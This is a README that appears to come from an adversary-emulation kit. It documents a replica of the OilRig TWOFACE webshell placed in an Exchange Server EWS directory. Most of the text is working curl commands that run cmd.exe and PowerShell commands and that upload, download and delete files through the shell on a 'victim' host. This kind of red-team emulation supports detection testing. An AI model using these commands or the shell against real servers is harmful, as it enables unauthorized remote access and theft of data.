# TWOFACE WebShell Analog

# Setup

This file does not need to be compiled - it is a self contained (i.e., no code-behind file) C# application in aspx format. However, the default web.config file for the IIS site may require modifications, specifically to add the following line under the <assemblies> tag:

<add assembly="Microsoft.Exchange.Diagnostics, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />

For this scenario, OilRig has placed this webshell under C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews using various file names (for our purposes, contact.aspx)1.

Default access is limited to Windows Authentication, so requests made to the page will need valid credentials for an authorized user.

# Execution with the Shell

All execution takes place via HTTP POST1. If a GET request is sent, the C# will not execute and the visitor will be given a fake error page saying the resource cannot be found on the server. Responses to actions taken with the shell will be provided at the end of the returned page under a <pre> tag. If you are using PowerShell instead of cUrl to issue the request, you will need to select and expand the Content element of the response.

If Windows Authenticiation is used, cUrl commands must contain additional flags to allow for successful negotiation: --http1.1 and --ntlm. HTTPV2 does not support NTLM authentication.

# Command Execution

Command execution requires two POST parameters1:

  • pro - the process to use for execution (cmd.exe or powershell.exe)
  • cmd - The command to execute

Commands are not URL encoded per the CTI. For complex commands, consider using Base64 and encoded PowerShell. Please note: '+' is a valid Base64 character and may be converted to a space in transit.


curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST --data "pro=cmd.exe" --data "cmd=whoami" .../EWS/contact.aspx

curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST --data "pro=powershell.exe" --data "cmd=Get-Childitem -Path 'c:\users\'" .../EWS/contact.aspx
curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST --data "pro=powershell.exe" --data "cmd=-e dwBoAG8AYQBtAGkA" .../EWS/contact.aspx

# File Actions

The webshell supports two different sets of file actions:

  • Upload file to the %TEMP% directory
  • Upload file to arbitrary path
  • Download file from arbitrary path
  • Delete file (from %TEMP% by default, or arbitrary path if supplied)

# %TEMP% File Upload

File uploads to %TEMP% (C:\Windows\Temp by default) require two parameters1:

  • upd - the file name to use on the victim
  • upb - The Base64-encoded content of the file (note: unlike encoded commands above, we have modified this command to replace spaces with '+' signs to allow for binary file uploads)


curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST --data "upd=file.ext" --data "upb=$(base64 file.ext)" .../EWS/contact.aspx

# Arbitrary Path File Upload

This form up upload requires POST Form data and more parameters1:

  • upl - the POST form field that contains the file data to write to disk
  • sav - the path in which to save the file
  • vir - boolean value to specify if this is a virtual path or physical (default)
  • nen - the file name on the victim (defaults to the uploaded file name)
  • [arbitrary] - a field containing the file information. NAME MUST MATCH THE VALUE GIVEN IN upl


curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST -F "upl=f1" -F 'sav=C:\Users\Public\' -F "vir=false" -F "nen=file.ext" -F 'f1=@file.ext' .../EWS/contact.aspx

# File Download

Downloads only require a single field: don - the path to the file1


curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST -k -X POST -o file.ext --data 'don=c:\windows\temp\file.ext' .../EWS/contact.aspx

# File Delete

File deletes only require a single parameter: del - the name of the file to delete1

If no path is supplied, %TEMP% will be used. Otherwise, specify path\to\file.ext


Deletes from %TEMP%:
curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST --data 'del=file.ext' .../EWS/contact.aspx

Deletes from path:
curl --http1.1 --ntlm -u 'domain\user:password' -k -X POST --data 'del=c:\users\public\file.ext' .../EWS/contact.aspx

# Testing

A shell script has been provided to exercise each of the options using cUrl. The user will be prompted for a few details on where to send the requests and any authentication information (Windows Authentication only). Ensure the user running the script has write access to the directory it is being run from as a few test files will be made.



[1] Unit 42 - TwoFace Webshell: Persistent Access Point for Lateral Movement